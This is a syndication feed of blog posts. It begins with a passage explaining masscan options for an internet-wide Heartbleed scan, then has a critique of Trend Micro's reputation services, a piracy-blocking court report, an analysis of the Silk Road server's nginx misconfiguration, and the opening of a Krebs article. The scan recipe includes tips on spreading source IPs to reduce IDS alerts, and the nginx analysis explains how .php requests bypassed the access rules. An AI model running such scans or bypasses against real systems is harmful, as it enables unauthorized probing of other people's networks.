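a = ipaddress.ip_network("0.0.0.0/0")
b = ipaddress.ip_network("127.0.0.0/0", strict=False)  # host bits set, so strict=False

assert a == b                      # a /0 mask zeroes every bit: same network either way
assert a.num_addresses == 2**32    # "the entire Internet": all 4,294,967,296 IPv4 addresses
```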

-p443
This says to scan on port 443, the default SSL port. At some point in the future, I’ll scan for some other common SSL ports, including the STARTTLS ports like port 25.

--banners
This means to create a full TCP connection with the system and grab “banner” info. In this case, that means sending an SSL “hello” request and to parse the received X.509 certificate. It’ll parse that certificate and dump the hostname from it.

--capture cert
This means to also capture the X.509 certificate. I don’t really care for this scan, but on general principles, grabbing certificates is good for other SSL research. This happens before the heartbleed check.

--heartbleed
This means that after the initial SSL Hello it will attempt a “Heartbleed” request. In this case, the returned information will just be a “VULN: [Heartbleed]” message for the IP address. If you want more, then “--capture heartbleed” can also be used to grab the “bleeding” information. I don’t do that.

-oB heartbleed.scan
This means to save the results in a binary file called “heartbleed.scan”. This is the custom masscan format that can be read later using the --readscan option to convert to XML, JSON, and other output formats. I always scan using this format, but I think I’m the only one.

--rotate-dir /var/log/masscan
You don’t see it here on the command-line because it’s in masscan.conf (see above), but every hour the contents of “heartbleed.scan” are rotated into this directory and a new file created. That file is timestamped with the current time.

--rotate hourly
You don’t see it here, but it’s in masscan.conf. This means that rotation to /var/log/masscan should happen every hour on the hour. If you start a scan at 1:55, it’ll be rotated at 2:00. It renames the file with the timestamp as the prefix, like 141007-020000-heartbleed.scan, so having it aligned to an even hour makes things easier to work with. Note that “minutely” and “daily” are also supported.

--rate 80000
People don’t like getting scanned too fast; it makes IDS and firewall logs unhappy. Therefore, I lower the rate to only 80,000 packets/second to reduce the strain. This consequently means the scan is going to take around 13 hours to complete.

--source-ip 209.126.230.73-209.126.230.76
On the same principle as slowing the rate, spreading the scan across multiple source IP addresses makes IDS/firewalls squawk less, and makes people less unhappy. We have only a small range to play with, so I’m only using 4 IP addresses. Note that masscan has its own TCP/IP stack — it’s “spoofing” these IP addresses; no machine actually exists there. If you try to ping them, you’ll get no response. This is the best way to run masscan, though people still find it confusing.

--source-port 32768-65535
By default, masscan uses a randomly assigned source port. I prefer to use a range of source ports.
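As a sanity check on the parameters above: 3.5 billion targets at 80,000 packets/second works out to roughly half a day, consistent with the quoted 13 hours once retransmits and overhead are factored in:

```python
hosts = 3.5e9    # targets remaining after exclusions (from masscan.conf)
rate = 80_000    # packets per second (--rate 80000)

hours = hosts / rate / 3600
print(f"{hours:.1f} hours")  # ~12.2 hours of pure probe time
assert 12 < hours < 13
```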

The Hacker Factor Blog: Downward Trend

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Over the last few months, I have been enhancing my network defenses at FotoForensics. It is no longer enough to just block bad actors. I want to know who is attacking me, what is their approach and any other information. I want to “know my enemy”.

To gain more knowledge, I’ve begun to incorporate DNS blacklist data. There are dozens of servers out there that use DNS to query various non-network databases. Rather than resolving a hostname to a network address, they encode an address in the hostname and return a code that denotes the type of threat.
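The dnsbl convention is simple: reverse the octets of the address, prepend them to the blacklist’s DNS zone, and look the name up. A returned A record (typically in 127.0.0.0/8) encodes the threat category, while NXDOMAIN means the address is unlisted. A sketch using one widely known zone (the live lookup requires network access, and heavy use of any list is subject to that list’s usage policy):

```python
import socket

def dnsbl_query_name(ip: str, zone: str = "zen.spamhaus.org") -> str:
    """Build the dnsbl hostname: 203.0.113.7 -> 7.113.0.203.zen.spamhaus.org."""
    return ".".join(reversed(ip.split("."))) + "." + zone

def dnsbl_lookup(ip: str, zone: str = "zen.spamhaus.org"):
    """Return the list's response code (an address in 127.0.0.0/8),
    or None if the address is unlisted (NXDOMAIN)."""
    try:
        return socket.gethostbyname(dnsbl_query_name(ip, zone))
    except socket.gaierror:
        return None
```

Querying 30 different lists is just a loop over 30 zone names; the interesting work is interpreting each list’s response codes.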

This becomes extremely useful when identifying a network attacker. Is the attack personal, or is it a known bot that is attacking everyone on the Internet? Is it an isolated system, or part of a larger network? Is it coming directly, or hiding behind an anonymous proxy network? Today, FotoForensics just identifies attacks. Tomorrow it will identify attackers.

Reputation at Stake

Beyond DNS lookup systems, there are some reputation-based query services. While the DNS blocklist (dnsbl) services are generally good, the web based reputation systems vary in quality. Many of them seem to be so inaccurate or misleading as to be borderline snake oil.

Back in 2012, I wrote about Websense and how their system really failed to work. This time, I decided to look at Trend Micro.

The Trend Micro Site Safety system takes a URL and tells you whether it is known hostile or not. It even classifies the type of service, such as shopping, social, or adult content.

To test this system, I used FotoForensics as the URL.

According to them, my server has never been evaluated before and they would evaluate it now. I looked at my logs and, yes, I saw them query my site:

150.70.97.121 - - [05/Oct/2014:06:35:45 -0500] "GET / HTTP/1.1" 200 139 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
150.70.97.119 - - [05/Oct/2014:06:52:05 -0500] "GET / HTTP/1.1" 200 139 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

The first thing I noticed is that it never crawled my site. It only looked at the opening page. They downloaded no images, ignored the CSS, and didn’t look anywhere else for text to analyze. This is the same mistake that Websense made.

The second thing I noticed was the lie: They say that they have never looked at my site before. Let’s look back at my site’s web logs. The site was publicly announced on February 9, 2012.

150.70.75.28 - - [10/Feb/2012:03:28:56 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.75.28 - - [10/Feb/2012:05:55:32 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.172.102 - - [10/Feb/2012:12:16:30 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.172.102 - - [10/Feb/2012:12:16:34 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.75.28 - - [10/Feb/2012:23:21:51 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.75.28 - - [11/Feb/2012:06:51:29 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.75.28 - - [14/Feb/2012:02:00:48 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.75.28 - - [14/Feb/2012:03:24:48 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
150.70.75.28 - - [14/Feb/2012:03:25:51 -0600] "GET / HTTP/1.0" 200 1865 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

All of these network addresses are Trend Micro. According to my logs, they visit my site and the “/” URI often, usually multiple times per day. There were 1,073 visits in 2012, 4,443 visits in 2013, and over 2,463 (so far) in 2014. So I certainly do not believe them when their page says that they have never visited the site before.

Since they clearly scanned my site, I wanted to see the results. I rechecked their service an hour later, a few hours later, and over a day later. They still report it as being untested.

Uploading Content

Trend Micro first got my attention back in 2012, when they were automatically banned for uploading porn to FotoForensics. What happened: someone using Trend Micro’s reputation software uploaded porn to FotoForensics. A few seconds later, the reputation system checked the URL and ended up uploading the same porn, resulting in an automatic ban.

This second upload happened because Trend Micro was checking a GET request. And in this case, the GET was used to upload a URL containing porn to my site.

Besides performing a double upload, these duplicate requests can cause other problems. You know all of those online shopping sites that say “Do not reload or your credit card may be charged a second time”? Trend Micro might cause that second click since they resubmit URLs.

I also noticed that Trend Micro’s reputation checker would occasionally upload URL-based attacks to my site. It appears that some bad guys may be using the reputation checker to proxy attacks. This way, if the attack succeeds then the bad guy can get in. And if it is noticed, then the sysadmins would blame Trend Micro. (These attacks stand out in my logs because Trend Micro uploads a URL that nobody else uploads.)

I tried to report these issues to Trend Micro. Back in 2012, I had a short email exchange with them that focused on the porn uploads. (The reply basically disregarded the concern.) Later, in 2013, I provided more detail about the proxy abuses to a Trend Micro employee during a trip to California. But nothing was ever done about it.

After-the-Fact Scanning

One of the biggest issues that I have with Trend Micro’s reputation system is the order of events.

In my logs, I can see a user visiting a unique URL. Shortly after the visit, Trend Micro visits the same URL. This means that the user was allowed to visit the site before the reputation was checked. If the site happens to be hostile or contains undesirable content, then the user would be alerted after the fact. If the site hosts malware, then you’re infected long before Trend Micro would alert you of the risk.

To put it bluntly: if Trend Micro is going to be warning users based on a site’s reputation, then shouldn’t the warning come before the user is granted access to the site?

Quality of Reporting

Trend Micro permits users to submit URLs and see the site’s reputation. I decided to spot-check their system. I submitted some friendly sites, some known to be hostile, and some that host adult content… Here are some of the results:

  • Trend Micro: “Safe.”

  • Symantec: “Safe.”
  • Google: “Safe.”
  • Craigslist: “Safe.” Really? Craigslist? Perhaps they didn’t scan some of the escort listings. I gave it the URL to Craigslist “Washington, DC personals”. (I had searched Google for ‘craigslist escorts’ and this was the first result. Thanks DC!) This URL is anything but family friendly. There are subjects like “Sub Bottom Seeking Top/Master for Use and Domination” and “Sunday Closeted Discreet Afternoon Delight”. The Trend Micro result? “Safe”. They classified it as “Shopping” and not adult content.
  • Super T[redacted] (a known porn site). Trend Micro said “Safe” but classified it as “Pornography”. This is a great result and gives me hope for Trend Micro’s system.
  • Singapore Girls. “Safe” and “Adult / Mature Content”. Most other services classify this as a porn site. I wonder where they draw the line between pornography and mature content…
  • Backpage: “Safe, Newsgroups, Shopping, Travel”. I then uploaded the link to their escorts page, which has some explicit nudity and lots of adult content. The result? Safe, Newsgroups, Shopping, Travel. Not even an “18”, “Adult”, or “Mature Content” rating.
  • Pinkbike.com: “Safe, Sports”. I’ll agree with this. It’s a forum for bicycle enthusiasts.
  • 4chan: “Dangerous, Disease Vector”. According to Trend Micro, “Dangerous” means the site hosts malware or phishing. 4chan is not a phishing site, and I have never seen malware hosted at 4chan. While 4chan users may not be friendly, the site does not host malware. This strikes me as a gross misclassification. It should probably be “Safe, 18+, Adult Content, Social Network”.
  • >_: One of 4chan’s channels goes by the name “/b/”. If you see someone talking about “/b/”, then you know they are talking about 4chan’s random topics channel. Outside of 4chan, other forums have their own symbolic names. If you don’t know the site represented by “>_”, then that’s your problem — I’m not going to list the name here. This is a German picture sharing site that has more porn than 4chan. While 4chan has some channels that are close to family friendly, the >_ site is totally not safe for work. Trend Micro says “Safe, Blog/Web Communications”. They say nothing about adult content; if Trend Micro thinks 4chan is “dangerous”, then >_ should be at least as dangerous.

With Filename Ballistics, I have been able to map out a lot of sites that use custom filename formats. A side effect is that I know which sites host mostly family friendly content, and which do not. I submitted enough URLs to Trend Micro’s reputation system that they began to prompt me with a captcha to make sure I’m human. The good news is that they knew most of the sites. The bad news is that they missed a lot of the sites that host adult content and malware.

For a comparison, I tested a few of these sites against McAfee’s SiteAdvisor. McAfee actually scanned FotoForensics and reported “This link is safe. We tested it and didn’t find any significant security issues.” They classified it as “Media Sharing”. (I’ll agree with that.) McAfee also reports that 4chan is suspicious and a “parked domain” (WTF?), they reported that >_ wasn’t tested, Craigslist is a safe (no malware) site with “Forum/Bulletin Boards”, and Singapore Girls is “Safe: Provocative Attire”.

Other Lookup Tools

Trend Micro also has an IP address reputation tool. This is supposed to be used to identify whether an address is associated with known spammers, malware, or other online attacks.

At FotoForensics, I’ve been actively detecting, and in some cases blocking, hostile network addresses. I use a combination of a custom intrusion detection system and known DNS Blacklist services. This has dramatically cut down on the number of attacks and other abuses against my site.

I uploaded a couple of network addresses to Trend Micro in order to see how they assigned reputations:

  • 178.175.139.141. The Honeynet Project reports “Suspicious behavior, Comment spammer”. Tornevall.org reports “Service abuse (spam, web attacks)”. My own system identified this as a TOR node. Trend Micro reports: “Unlisted in the spam sender list”.

  • 185.8.238.25. This is another Suspicious behavior, Comment spammer, TOR node. Trend Micro fails to identify it.
  • 66.249.69.35. Honeynet Project says “Search engine, Link crawler”. My system identifies it as Googlebot. Trend Micro says “Unlisted in the spam sender list”. This looks like their generic message for “not in any of our databases”.

    Keep in mind, tracking TOR nodes is really easy. If you run a TOR client, then your client automatically downloads the TOR node list. For me, I just start up a client, download the list, and kill the client without ever using TOR. This gives me a large list of TOR nodes and I can just focus on the exit nodes.

    At minimum, every TOR node should be associated with “Suspicious behavior”. This is not because users using TOR are suspicious. Rather, it is because there are too many attackers who use TOR for anonymity. As a hosting site, I don’t know who is coming from TOR and the odds of it being an attacker or spammer are very high compared to non-TOR users.

  • 91.225.197.169. This system actively attacked my site. Trend Micro reports “Bad: DUL”. As they define it, “the Dynamic User List (DUL) includes IP addresses in dynamic ranges identified by ISPs. Most legitimate mail sources have static IP addresses.”

    A Dynamic User List (aka Dialup User List) contains known subnets that are dynamically assigned by ISPs to their customers. These lists are highly controversial. On one hand, they force ISPs to regulate all email and take responsibility for reducing spam. On the other hand, this approach ends up blacklisting a quarter of the Internet. In effect, users must send email through their ISP’s system and are treated as spammers before ever sending an email.

    If this sounds like the Net Neutrality debate, then you’re right — it is. Net neutrality means that ISPs cannot filter spam; all packets are equal, including spam. Without neutrality, ISPs are forced to help mitigate spam.

    The good news is, Trend Micro noticed that this was an untrustworthy address. The bad news is that they classified it because it was a dynamic address and not because they actually noticed it doing anything hostile.

  • 208.66.72.154. This system scanned my site for vulnerabilities. The Honeynet Project says “Suspicious behavior, Comment spammer”. Tornevall.org reports “Service abuse (spam, web attacks)”. Trend Micro? “Unlisted in the spam sender list”.
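The node-tracking approach described above takes only a few lines of code. This sketch assumes you have already saved the exit-node list from a Tor client to a local file, one address per line (the filename here is made up):

```python
# Sketch: check visitor IPs against a set of known TOR exit nodes.
# Assumes a locally saved copy of the exit-node list (one IP per line),
# e.g. extracted from a TOR client's downloaded node list.

def load_exit_nodes(path="tor-exit-list.txt"):
    """Read one IP address per line into a set for O(1) lookups."""
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

def is_tor_exit(ip, exit_nodes):
    """True if this visitor appears to be coming through a TOR exit."""
    return ip in exit_nodes
```

Feed your web server's access log through `is_tor_exit()` and you have the same "TOR node" tagging my own system produces.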

Alright… so maybe Trend Micro is only looking for spammers… Let’s submit some IP addresses from spam that I recently received.

  • 46.174.67.107. Other systems report: Suspicious behavior, Comment spammer, Known proxy, Service abuse (spam, web attacks), Network attack. Trend Micro reports “Bad: DUL”. Again, Trend Micro flagged it because it is a dynamic address and not because they noticed it doing anything bad.

  • 198.12.97.72. None of the services, including Trend Micro, identify it. As far as I can tell, anything from 198.12.64.0/18 is spam. This range currently accounts for a solid 30% of all spam to my own honeypot addresses.
  • 191.101.45.39. The blacklist services that I use found nothing. JP SURBL identifies it as a spammer’s address. Trend Micro reports it as “Bad: QIL”. According to them, the Quick IP Lookup Database (QIL) stores known addresses used by botnets.

    Botnets typically consist of a wide range of compromised computers that work together as a unit. If you map botnet nodes to geolocations, you will usually see them scattered all over, not limited to a specific subnet. In contrast to botnets, many spammers acquire large sequential ranges of network addresses (subnets) from unsuspecting (or uncaring) hosting sites. They use the addresses for sending spam. While these spam systems may be remotely controlled, the tight cluster is usually not managed like a botnet.

    According to my own spam collection, this specific address is part of a spam network that spans multiple subnets (191.101.36.0 – 191.101.47.255 and 191.101.248.0/22). Each subnet runs a different mailing campaign, and they are constantly sending spam. This same spammer recently added another subnet, 198.12.64.0/18, which includes the previous 198.12.97.72 address.

    This spammer has been active for months, and Trend Micro flags it. However, they identify it as “Bad: QIL”. As far as I can tell, this address is not part of a botnet (as identified by QIL). Instead, this spammer signs up with various hosting sites and spams like crazy until getting booted out.

  • 173.244.147.163. Most services, including Trend Micro, missed this. Barracuda Central was the only one to identify this as a spammer.
  • 96.114.154.194. This spammer is listed in the uceprotect.net blacklist, but Trend Micro does not identify it.
  • 197.149.139.101. I caught this address searching my site for email addresses and sending me spam. It is both a harvester and a spammer. This network address is listed in 7 different spam blacklists. Trend Micro reports it as a botnet (Bad: QIL), but it’s actually part of a sequential set of network addresses (a subnet) used by a spammer.
  • 93.174.90.21. This address is detected by tor.dnsbl.sectoor.de, but not Trend Micro.
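The subnet-versus-botnet distinction I keep drawing can be checked mechanically with Python’s `ipaddress` module: addresses that all collapse into one network suggest a rented subnet, not a botnet. A sketch:

```python
import ipaddress

def in_one_subnet(ips, prefix_len=18):
    """True if every address falls inside the same /prefix_len network.

    A tight cluster (all addresses in one subnet) suggests a spammer
    renting a sequential range from a hosting site; addresses scattered
    across many networks look more like a botnet.
    """
    nets = {ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
            for ip in ips}
    return len(nets) == 1
```

For example, the 198.12.x.x addresses above all land in 198.12.64.0/18, whereas a real botnet sample would span many unrelated networks.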

I certainly cannot fault Trend Micro for failing to identify most of the addresses used for spam. All of the 27 public spam blacklists and three other blacklists that I checked had high false-negative rates and failed to associate most addresses with spam. Every blacklist seems to have its own tiny, independent set of addresses, with little overlap between them. However, Trend Micro’s subset seems to be significantly smaller than the other blacklists’. The best ones, based on my own testing, are b.barracudacentral.org and dnsbl.sorbs.net.
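For reference, a DNSBL such as b.barracudacentral.org is queried over ordinary DNS: reverse the IP’s octets, append the zone, and resolve the name. A listed address resolves (typically to something in 127.0.0.0/8); a clean address returns NXDOMAIN. A minimal sketch:

```python
import socket

def dnsbl_name(ip, zone):
    """Build the DNSBL query name: reverse the octets, append the zone.
    e.g. 91.225.197.169 + zone -> 169.197.225.91.<zone>"""
    return ".".join(reversed(ip.split("."))) + "." + zone

def is_listed(ip, zone="b.barracudacentral.org"):
    """A listed address resolves; NXDOMAIN means not listed."""
    try:
        socket.gethostbyname(dnsbl_name(ip, zone))
        return True
    except socket.gaierror:
        return False
```

This is how I compared the various blacklists against my own honeypot data: the same address, queried against each zone in turn.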

In general, Trend Micro seems correct about the addresses that it flags as hostile — as long as you ignore the stated cause. Unfortunately, Trend Micro simply doesn’t know about many addresses. You should expect a high false-positive rate due to generic inclusions, and a high false-negative rate (Type-II error) due to their small database. Moreover, many of their matches appear to come from generic rules that classify large swaths of addresses as hostile without any proof, rather than from any actual detection. This means Trend Micro has a high degree of Type-III errors: correct by coincidence. Finally, Trend Micro seems to classify any network of spam systems as a “botnet”, even when they are not botnets.

About Trend Micro

Trend Micro offers many products. Their anti-virus software is as good as any. But that’s not saying much. As Trend Micro’s CEO Eva Chen said in 2008, “I’ve been feeling that the anti-virus industry sucks. If you have 5.5 million new viruses out there how can you claim this industry is doing the right job?”

Virtually the entire AV industry is reactive. First they detect an outbreak, then they evaluate the problem and create a detector. This means that the attackers always have the advantage: they can create new malware faster than the AV companies can detect and react. The move toward a reputation-based system as a predictor is a good preventative approach.

Unfortunately, Trend Micro seems to have seriously dropped the ball. Their system lies about whether a site has been checked and they validate the site after the user has accessed it. They usually report incorrect information, and when they are right, it seems due more to coincidence than accuracy.

I do believe that a profiling system integrated with a real-time detector is a great proactive alternative. However, Trend Micro’s offerings lack the necessary accuracy, dependability, and reputation. As I reflect on Eva Chen’s statement, I can only conclude one thing: it’s been six years, and they still suck.

TorrentFreak: Court Orders Immediate Pirate Site Blockade

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Kino.to, at the time one of the world’s largest illegal streaming portals, was shut down in 2011 as part of Europe’s largest ever action against piracy sites.

However, just a month before Kino.to was dismantled, Austrian ISP ‘UPC’ was served with a preliminary injunction ordering it to block subscriber access to the site. The order had been obtained by the Hollywood-affiliated anti-piracy group VAP but it was called into doubt by the ISP. This led to the Austrian Supreme Court referring the matter to the European Court of Justice.

Earlier this year the ECJ handed down its widely publicized decision which stated that yes, in reasonable circumstances, pirate sites can indeed be blocked by European ISPs.

On the back of this ruling, VAP subsequently wrote to several local ISPs (UPC, 3, Tele2 and A1) demanding blockades of Movie4K.to and Kinox.to, a site that took over from Kino.to. This would become the test case on which all future blockades would be built.

When this formal request for the ISPs to block the sites was rejected, in August VAP sued the providers. And now, after more than three years of wrangling, VAP have finally got their way.

In a ruling handed down yesterday by the Commercial Court of Vienna, UPC, 3, Tele2 and A1 were ordered to block Movie4K and Kinox with immediate effect. According to Der Standard, UPC and A1 placed blocks on the sites within hours, with 3 and Tele2 expected to comply with the injunction today.

But while another important hurdle has now been overcome, there is some way to go before VAP will have achieved everything they initially set out to do. At issue now is how far the ISPs will have to go in order to comply with the court order. It’s understood that VAP requires DNS and IP address blocking at a minimum, but whether the ISPs intend to comply with that standard remains to be seen.

It’s important for VAP, and other anti-piracy groups waiting in the wings, that these technical steps are workable going forward. Both VAP and the IFPI have lists of sites they would like blocked in the same way as Movie4K and Kinox have been, so it’s crucial to them that blockades aren’t easily circumvented.

Once this issue has been dealt with, in the next few months it’s likely that attention will turn to legal action being planned by the IFPI. The recording group has taken on the task of having torrent sites blocked in Austria, starting off with The Pirate Bay, isoHunt.to, 1337x.to and H33t.to.

IFPI is expected to sue several ISPs in the hope that local courts will treat torrent sites in the same way as they have streaming services. Once that’s been achieved – and at this stage it seems likely – expect long lists of additional domains to be submitted to the courts.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: Reading the Silk Road configuration

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Many of us believe it wasn’t the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using “parallel construction”, meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn’t true.

Today, Brian Krebs released data from the defense team that seems to confirm the “parallel construction” theory. I thought I’d write up a technical discussion of what was found.

The Tarbell declaration

A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server (“the Tarbell declaration“). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the “packet headers”.

Thirdly, he saved none of the forensics data. You’d have thought that, had this been real, he would have at least captured packet logs or even screenshots of what he did. I’m a technical blogger; I document this sort of thing all the time. It’s not hard for me, and it shouldn’t be hard for the FBI when it’s the cornerstone of the entire case.

Lastly, Tarbell doesn’t even deny it was parallel construction. A scenario of an NSA agent showing up at the FBI offices and opening a browser to the IP address fits within his description of events.

I am a foremost Internet expert on this sort of thing. I think Christopher Tarbell is lying.

The two servers involved

There were two servers involved.

The actual Tor “onion” service ran on a server in Germany at the IP address 62.75.246.20. This was the front-end server.

The Silk Road data was held on a back-end server in Iceland at the IP address 193.107.86.49. This is the server Tarbell claims to have found.

The data dumped today on Brian Krebs’ site is configuration and log files from the second server.

The Icelandic configuration

The Icelandic backend had two “sites”, one on HTTP (port 80) running the phpmyadmin pages, and a second on HTTPS (port 443) for communicating the Silk Road content to the German onion server.

The HTTP (port 80) configuration is shown below. Because this requires “basic authentication”, Tarbell could not have accessed the server on this port.

However, the thing to note about this configuration is that “basic” authentication was used over port 80. If the NSA were monitoring links to/from Iceland, they could easily have discovered the password and used it to log onto the server. This is basic cybersecurity, what the “Wall of Sheep” at DefCon is all about.
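This is easy to demonstrate: HTTP “basic” authentication merely base64-encodes the credentials, so anyone passively sniffing port 80 recovers them trivially. A sketch with made-up credentials:

```python
import base64

# Sketch: what a passive sniffer sees in a plain-HTTP Basic auth exchange.
# The Authorization header is not encrypted, only base64-encoded.
# "admin:hunter2" is a made-up example credential.
header = "Basic " + base64.b64encode(b"admin:hunter2").decode()

def recover_credentials(authorization_header):
    """Decode the base64 payload of a 'Basic' Authorization header."""
    scheme, _, payload = authorization_header.partition(" ")
    assert scheme == "Basic"
    return base64.b64decode(payload).decode()
```

One base64 decode and the sniffer has the username and password in the clear — which is exactly why the Wall of Sheep exists.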

The following picture shows the configuration of the HTTPS site.

Notice firstly that the “listen 443” directive specifies only a port number and not an IP address. Consequently, anybody on the Internet could connect to the server and obtain its SSL certificate, even if they can get nothing but an error message from the web server. Brian Krebs quotes Nicholas Weaver as claiming “This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server”. This is wrong; the web server accepts all TCP connections, though it may return a “403 Forbidden” as the result.

BTW: one plausible way of having discovered the server is to scan the entire Internet for SSL certificates, then correlate information in those certificates with the information found going across the Tor onion connection.

Next is the location information that allows only localhost, the German server, and then denies everything else (“deny all”). As mentioned above, this doesn’t prevent the TCP connection, but does produce a “403 forbidden” error code.

However, there is a flaw: this configuration is overridden for PHP files in the next section down. I’ve tested this on my own server. While non-PHP files are not accessible on the server, anything with the .php file extension still runs for everyone.

Worse yet, the login screen uses “/index.php”. The rules above convert an access of “/” automatically to “/index.php”. If indeed the server has the file “/var/www/market/public/index.php”, then Tarbell’s explanation starts to make sense. He’s still missing important details, and of course there is no log of him having accessed the server this way, but this demonstrates that something like his description isn’t impossible. One way this could have been found is by scanning the entire Internet for SSL servers, then searching for the string “Silkroad” in the resulting webpages.
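To make the flaw concrete, here is a hypothetical nginx fragment in the spirit of what the leaked configuration describes. The paths, IP address, and fastcgi socket are assumptions for illustration, not the actual file:

```nginx
# Hypothetical reconstruction of the pattern described above -- NOT the
# actual leaked file. The access controls in the first block are silently
# bypassed by the later PHP block, which repeats no allow/deny of its own.

location / {
    allow 127.0.0.1;       # localhost
    allow 62.75.246.20;    # the German front-end server
    deny  all;             # everyone else gets "403 Forbidden"
    index index.php;       # "/" is rewritten to "/index.php" ...
}

location ~ \.php$ {
    # ... but regex locations beat the "/" prefix location, and access
    # rules are not inherited between sibling locations, so any address
    # on the Internet can reach "/index.php" -- the login page.
    fastcgi_pass unix:/var/run/php-fpm.sock;
    include fastcgi_params;
}
```

In nginx, a regex `location` takes precedence over a prefix `location`, and `allow`/`deny` rules do not carry over between sibling blocks, which is why the override happens.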

The log files

The FBI imaged the server, including all the log files. Typical log entries looked like the following:

62.75.246.20 - - [14/Jul/2013:06:55:33 +0000] "GET /orders/cart HTTP/1.0" 200 49072 "http://silkroadvb5piz3r.onion/silkroad/item/0f81d52be7" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"

Since the defense could not find in the log files where Tarbell had accessed the system, the prosecutors helped them out by pointing to entries that looked like the following:

199.170.71.133 - - [11/Jun/2013:16:58:36 +0000] "GET / HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"

199.170.71.133 - - [11/Jun/2013:16:58:36 +0000] "GET /phpmyadmin.css.php?server=1&lang=en&collation_connection=utf8_general_ci&token=451ca1a827cda1c8e80d0c0876e29ecc&js_frame=right&nocache=3988383895 HTTP/1.1" 200 41724 "http://193.107.86.49/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"

However, these entries are wrong. First, they are for the phpmyadmin pages and not the Silk Road login pages, so they are clearly not the pages described in the Tarbell declaration. Second, they return “200 OK” as the status code instead of the “401 Unauthorized” one would expect from the configuration. This means either the FBI knew the password, or the configuration changed in the meantime, or something else is wrong with the evidence provided by the prosecutors.
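Checking claims like these against the logs is mechanical. A sketch of parsing combined-format entries to hunt for anomalies, such as a “200” on a path that should have demanded authentication (the regex assumes the standard combined log format shown above):

```python
import re

# Sketch: pull the client IP, request, and status code out of a
# combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return {ip, method, path, status} for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return {"ip": ip, "method": method, "path": path, "status": int(status)}
```

Run every line through `parse_line()` and filter for phpmyadmin paths with status 200; if the configuration demanded a password, those entries shouldn’t exist.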

Conclusion

As an expert in such topics as sniffing passwords and masscanning the Internet, I know that tracking down the Silk Road site is well within the NSA’s capabilities. Looking at the configuration files, I can attest to the fact that the Dread Pirate Roberts sucked at op-sec.

As an expert, I know the Tarbell declaration is gibberish. As an expert reading the configuration and logs, I know that it doesn’t match the Tarbell declaration. That’s not to say that the Tarbell declaration has been disproven, it’s just that “parallel construction” is a better explanation for what’s going on than Tarbell actually having found the Silk Road server on his own.

Krebs on Security: Silk Road Lawyers Poke Holes in FBI’s Story

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do.

The login prompt and CAPTCHA from the Silk Road home page.

Prior to its disconnection last year, the Silk Road was reachable only via Tor, software that protects users’ anonymity by bouncing their traffic between different servers and encrypting the traffic at every step of the way. Tor also lets anyone run a Web server without revealing the server’s true Internet address to the site’s users, and this was the very technology that the Silk Road used to obscure its location.

Last month, the U.S. government released court records claiming that FBI investigators were able to divine the location of the hidden Silk Road servers because the community’s login page employed an anti-abuse CAPTCHA service that pulled content from the open Internet — thus leaking the site’s true Internet address.

But lawyers for alleged Silk Road captain Ross W. Ulbricht (a.k.a. the “Dread Pirate Roberts”) asked the court to compel prosecutors to prove their version of events.  And indeed, discovery documents reluctantly released by the government this week appear to poke serious holes in the FBI’s story.

For starters, the defense asked the government for the name of the software that FBI agents used to record evidence of the CAPTCHA traffic that allegedly leaked from the Silk Road servers. The government essentially responded (PDF) that it could not comply with that request because the FBI maintained no records of its own access, meaning that the only record of their activity is in the logs of the seized Silk Road servers.

The response that holds perhaps the most potential to damage the government’s claim comes in the form of a configuration file (PDF) taken from the seized servers. Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, explains the potential significance:

